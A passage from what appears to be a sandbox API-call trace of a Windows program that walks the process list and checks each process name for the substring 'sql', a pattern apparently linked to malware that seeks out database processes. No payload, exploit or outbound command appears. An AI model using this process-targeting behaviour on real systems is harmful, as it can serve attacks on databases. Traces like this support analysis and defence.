lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.126] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35593e8 [0091.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35593e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0091.126] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0091.126] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0091.126] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0091.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.127] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35591f0 [0091.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35591f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0091.127] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0091.127] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0091.127] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0091.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.162] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3559328 [0091.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3559328, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0091.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0091.162] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0091.162] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0091.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.164] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3559400 [0091.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3559400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0091.164] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0091.164] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0091.164] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0091.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.165] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3559310 [0091.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3559310, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0091.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0091.165] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0091.165] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.167] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559418 [0091.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559418, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.167] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.167] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.167] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0091.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.169] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3559250 [0091.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3559250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0091.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0091.169] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0091.169] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0091.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.170] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35592c8 [0091.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35592c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0091.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0091.170] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0091.170] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.172] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559340 [0091.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559340, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.172] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.172] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0091.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.173] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35476c8 [0091.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35476c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0091.173] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0091.173] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0091.174] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.176] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559238 [0091.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.176] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.176] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.176] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.178] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559430 [0091.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559430, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.178] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.178] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.178] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.180] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35592e0 [0091.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35592e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.180] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.180] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.180] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.181] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559268 [0091.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559268, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.181] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.181] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.181] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.183] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559280 [0091.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559280, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.183] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.183] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.183] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.185] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35591d8 [0091.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35591d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.185] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.185] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.185] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.186] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559148 [0091.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559148, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.186] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.186] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.186] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.187] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559358 [0091.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559358, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.187] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.188] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.188] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.189] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559160 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559160, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.189] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.189] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.189] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.190] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559370 [0091.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3559370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.193] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.193] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.193] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0091.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.195] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559388 [0091.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3559388, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0091.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0091.195] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0091.195] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.196] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35593a0 [0091.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35593a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.196] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.196] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0091.196] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0091.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.197] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559178 [0091.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3559178, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0091.198] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0091.198] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0091.198] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0091.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.199] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3559190 [0091.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3559190, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 